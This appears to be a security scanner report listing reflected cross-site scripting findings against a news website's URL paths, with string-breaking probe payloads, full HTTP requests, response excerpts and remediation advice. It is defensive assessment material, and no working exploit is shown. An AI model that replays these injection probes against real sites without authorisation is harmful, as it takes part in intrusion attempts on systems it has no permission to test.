The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1998'%3bdad09d492bc was submitted in the REST URL parameter 1. This input was echoed as b1998';dad09d492bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionb1998'%3bdad09d492bc/columnists/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37548
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7773e'%3bee2319eb393 was submitted in the REST URL parameter 2. This input was echoed as 7773e';ee2319eb393 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists7773e'%3bee2319eb393/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44176
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f06c4'%3ba01e7d2f0a9 was submitted in the REST URL parameter 1. This input was echoed as f06c4';a01e7d2f0a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf06c4'%3ba01e7d2f0a9/columnists/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78746
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionf06c4';a01e7d2f0a9/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionf06c4';a01e7d2f0a9;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94765539?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10172'%3be803ff19434 was submitted in the REST URL parameter 2. This input was echoed as 10172';e803ff19434 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists10172'%3be803ff19434/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78669
Expires: Sun, 19 Dec 2010 03:13:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists10172';e803ff19434/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists10172';e803ff19434;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99836883?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf31'%3b503052c6ac3 was submitted in the REST URL parameter 4. This input was echoed as ebf31';503052c6ac3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673ebf31'%3b503052c6ac3/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64067
Expires: Sun, 19 Dec 2010 03:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes-rdsp-confusion/3996673ebf31';503052c6ac3/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes-rdsp-confusion;kw=3996673ebf31';503052c6ac3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6915'%3bc70b98c8ed7 was submitted in the REST URL parameter 5. This input was echoed as e6915';c70b98c8ed7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673/e6915'%3bc70b98c8ed7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44167
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6aacf'%3b2dcc50d2bea was submitted in the REST URL parameter 1. This input was echoed as 6aacf';2dcc50d2bea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6aacf'%3b2dcc50d2bea/columnists/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81434
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion6aacf';2dcc50d2bea/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion6aacf';2dcc50d2bea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35050549?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee06'%3bd1610b97601 was submitted in the REST URL parameter 2. This input was echoed as 6ee06';d1610b97601 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists6ee06'%3bd1610b97601/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76267
Expires: Sun, 19 Dec 2010 03:13:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists6ee06';d1610b97601/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists6ee06';d1610b97601;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74713967?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d84'%3b589204317ff was submitted in the REST URL parameter 4. This input was echoed as b5d84';589204317ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686b5d84'%3b589204317ff/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70018
Expires: Sun, 19 Dec 2010 03:13:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon-brown-fairy-tale/3996686b5d84';589204317ff/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon-brown-fairy-tale;kw=3996686b5d84';589204317ff;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8d99'%3b477af5f2dc was submitted in the REST URL parameter 5. This input was echoed as b8d99';477af5f2dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686/b8d99'%3b477af5f2dc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caad9'%3bfe560cef6f1 was submitted in the REST URL parameter 1. This input was echoed as caad9';fe560cef6f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinioncaad9'%3bfe560cef6f1/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81153
Expires: Sun, 19 Dec 2010 03:13:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinioncaad9';fe560cef6f1/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinioncaad9';fe560cef6f1;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94873299?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fea'%3bac5e157b03 was submitted in the REST URL parameter 2. This input was echoed as a4fea';ac5e157b03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsa4fea'%3bac5e157b03/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75080
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsa4fea';ac5e157b03/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsa4fea';ac5e157b03;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13084670?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83e8'%3b1465d38c955 was submitted in the REST URL parameter 4. This input was echoed as a83e8';1465d38c955 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670a83e8'%3b1465d38c955/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71352
Expires: Sun, 19 Dec 2010 03:13:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping-santa-puts-inflation-stocking/3996670a83e8';1465d38c955/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping-santa-puts-inflation-stocking;kw=3996670a83e8';1465d38c955;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faabd'%3b92cf6eecfea was submitted in the REST URL parameter 5. This input was echoed as faabd';92cf6eecfea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/faabd'%3b92cf6eecfea HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44507
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ad4f'%3be55a38084cf was submitted in the REST URL parameter 1. This input was echoed as 8ad4f';e55a38084cf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion8ad4f'%3be55a38084cf/columnists/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82077
Expires: Sun, 19 Dec 2010 03:14:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
